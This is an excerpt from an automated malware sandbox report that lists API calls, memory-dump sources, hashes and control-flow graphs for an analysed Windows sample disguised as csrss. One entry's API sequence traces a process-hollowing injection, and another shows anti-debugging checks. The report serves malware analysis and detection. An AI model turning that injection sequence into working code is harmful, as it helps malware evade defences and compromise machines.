                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$_free
                                                                                                                                                                                                                                                                                                                                  • String ID: \Last Version
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1597172325-2633859252
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c6852000844c8d996fc6234938bf3cfe1a7370bd4597880c854d9f1aadf0160
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 007685fa0e4860319d14e0348da3630cf06a86fcb695571c5d4064a287da27a1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c6852000844c8d996fc6234938bf3cfe1a7370bd4597880c854d9f1aadf0160
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F090B26052046FD610AB65EC46D8B77EDEFDA304F040428FA4897341E672AA558BA3
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0060F7CE
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0060F7F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • ec48478eb02322f7d86623ec, xrefs: 0060F7D7
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$_free
                                                                                                                                                                                                                                                                                                                                  • String ID: ec48478eb02322f7d86623ec
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1597172325-1363470560
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a96c47a4689b88f73d43cfa7cb6635485febaa01919db6ce664e661c960b3aa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2681add141cc61ab483d42ba3e51368867bf1124faf27f79b72accff8bdc17c5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a96c47a4689b88f73d43cfa7cb6635485febaa01919db6ce664e661c960b3aa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F31158B49087019FDB04EF68D58969EBBF1AB84314F408C2DF8D887351D778A9898B86
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00622013
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                                                                                                                  • String ID: E_a$InitializeCriticalSectionEx
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2593887523-3901417393
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7cfe22e40ff0b1052d3fc3d723f6258f529747256e5aba372724eff285767e40
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f68231077c59fa76b84b23d9a87b27fec3de1f0ba680a2e0358fba385d95e529
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cfe22e40ff0b1052d3fc3d723f6258f529747256e5aba372724eff285767e40
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE09232580A28B7CF211F51EC09DEE7F17EF15760F014010FD1815261CAB29971EBD0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Alloc
                                                                                                                                                                                                                                                                                                                                  • String ID: E_a$FlsAlloc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2773662609-2487831956
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 778cfabe35b9ae0ae6f43ee4fd542bdfda1e8b02476cadfc144a07b2837d9c99
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 374f4c4b5a3c0ecf5a326602c04bc27bb5fd864ef572407b561fdffffc172ae7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 778cfabe35b9ae0ae6f43ee4fd542bdfda1e8b02476cadfc144a07b2837d9c99
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCE0CD32A84A3477831132906D0ADEEBD5B8761B61F010111F90416251AEA05D5289D5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02E00156
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 02E0016C
                                                                                                                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 02E00255
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02E00270
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E00283
                                                                                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 02E0029F
                                                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02E002C8
                                                                                                                                                                                                                                                                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02E002E3
                                                                                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02E00304
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 02E0032A
                                                                                                                                                                                                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02E00399
                                                                                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02E003BF
                                                                                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 02E003E1
                                                                                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 02E003ED
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 02E00412
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2114202261.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2e00000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 93872480-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f3ec474a1b3da366d106007abcf9c85731e8baf6589ee5752e1a40de0612b5f4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB395D771AE81CF94
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 15 2e00420-2e004f8 17 2e004fa 15->17 18 2e004ff-2e0053c CreateWindowExA 15->18 21 2e005aa-2e005ad 17->21 19 2e00540-2e00558 PostMessageA 18->19 20 2e0053e 18->20 22 2e0055f-2e00563 19->22 20->21 22->21 23 2e00565-2e00579 22->23 23->21 25 2e0057b-2e00582 23->25 26 2e00584-2e00588 25->26 27 2e005a8 25->27 26->27 28 2e0058a-2e00591 26->28 27->22 28->27 29 2e00593-2e00597 call 2e00110 28->29 31 2e0059c-2e005a5 29->31 31->27
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02E00533
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2114202261.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2e00000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                                                                                                                                                                                  • API String ID: 716092398-2341455598
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6de7b5529b993f3b7fbe5ff215f0a0e84dbfa0af8bd8802f7e89b45a9199b93f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A512870D48388DAEB11CBE8C849BDDBFB2AF11708F148058D5447F2C6C7BA5699CB66
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 32 2e005b0-2e005d5 33 2e005dc-2e005e0 32->33 34 2e005e2-2e005f5 GetFileAttributesA 33->34 35 2e0061e-2e00621 33->35 36 2e00613-2e0061c 34->36 37 2e005f7-2e005fe 34->37 36->33 37->36 38 2e00600-2e0060b call 2e00420 37->38 40 2e00610 38->40 40->36
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 02E005EC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2114202261.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2e00000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                  • String ID: apfHQ$o
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-2999369273
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f77ce1bc39bc4718defc984e8e0a2485f3c5530f25d5e0fcff6585206d8ef14c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64011E70C0425CEADB10DBD8C5583EEBFB5AF41308F188099C4492B281D7769B99CBA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 41 2c007a6-2c007bf 42 2c007c1-2c007c3 41->42 43 2c007c5 42->43 44 2c007ca-2c007d6 CreateToolhelp32Snapshot 42->44 43->44 45 2c007e6-2c007f3 Module32First 44->45 46 2c007d8-2c007de 44->46 47 2c007f5-2c007f6 call 2c00465 45->47 48 2c007fc-2c00804 45->48 46->45 51 2c007e0-2c007e4 46->51 52 2c007fb 47->52 51->42 51->45 52->48
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C007CE
                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02C007EE
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2113842934.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2c00000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1d1d4dae44e4a8b162e9defa3452e9491fd66bf9a200da9cde886310764cdc26
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF090322017156FE7203BF9A8CCB6F77ECAF89669F110528E643910C0DBB8F9458E61
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 54 2c00465-2c0049f call 2c00778 57 2c004a1-2c004d4 VirtualAlloc call 2c004f2 54->57 58 2c004ed 54->58 60 2c004d9-2c004eb 57->60 58->58 60->58
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C004B6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2113842934.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2c00000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff8c20fc5a41ae8860a10b1286c41e14d1ede41510af5fde43b15dfc6e300fb1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72113C79A40208EFDB01DF98C985E98BBF5AF08351F058094F9489B361D775EA50EF80
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_006A1E69 1 Function_006949ED 2 Function_006970EC 37 Function_0069592F 2->37 3 Function_006957EE 62 Function_0069571F 3->62 4 Function_0069C2EE 5 Function_006943E0 8 Function_00694A78 5->8 14 Function_00696948 5->14 25 Function_00696950 5->25 6 Function_0069E662 7 Function_006C5FE7 7->2 30 Function_00696254 7->30 32 Function_006959A8 7->32 35 Function_006C5FAA 7->35 8->14 9 Function_00699BFC 12 Function_00695DF0 9->12 10 Function_0069C1FC 10->0 49 Function_006A1E88 10->49 11 Function_00695AF1 11->62 13 Function_00695848 27 Function_0069B255 13->27 13->30 41 Function_00695926 13->41 58 Function_00696299 13->58 61 Function_0069591D 13->61 64 Function_00696610 13->64 15 Function_0069CF4A 16 Function_00699BCC 17 Function_0069C34F 18 Function_0069C4C0 19 Function_00696640 34 Function_00696CAD 19->34 54 Function_00696B02 19->54 19->62 20 Function_0069D2C2 36 Function_00694A2F 20->36 38 Function_0069452F 20->38 21 Function_00694A42 21->37 22 Function_006951D9 23 Function_00694ADD 44 Function_00699ABF 23->44 24 Function_006950D0 39 Function_0069CFA1 25->39 26 Function_0069C550 26->18 53 Function_0069C500 26->53 28 Function_00696155 28->36 28->38 29 Function_00694A55 29->1 29->21 29->36 31 Function_0069C3D6 31->31 32->19 32->37 33 Function_006C6028 33->3 33->7 33->13 33->26 33->29 33->32 33->33 33->36 33->38 43 Function_006957BA 33->43 48 Function_006957B4 33->48 52 Function_00696481 33->52 56 Function_00694A87 33->56 60 Function_0069579A 33->60 34->20 34->54 35->2 35->11 35->26 35->30 35->32 35->35 35->37 36->37 37->13 37->43 37->52 37->56 37->62 38->14 38->62 39->39 40 Function_006956A4 40->64 41->44 42 Function_0069C338 42->10 43->62 45 Function_0069D030 45->40 45->62 65 Function_00695716 45->65 46 Function_006962B0 46->4 46->8 46->26 46->42 55 Function_0069C305 46->55 63 Function_0069C31E 46->63 47 Function_0069C333 50 Function_0069D20D 50->36 50->38 51 Function_0069C28C 51->8 51->10 54->5 54->20 54->24 54->28 54->45 54->50 59 Function_0069D199 54->59 55->0 56->1 56->9 56->16 56->23 56->30 56->36 56->58 57 Function_0069B707 57->22 57->30 57->58 59->36 59->38 61->44 62->64 65->40

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                                                                                                                                                  • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.4117166937.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1003287236-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.4117166937.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.4117166937.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_csrss.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
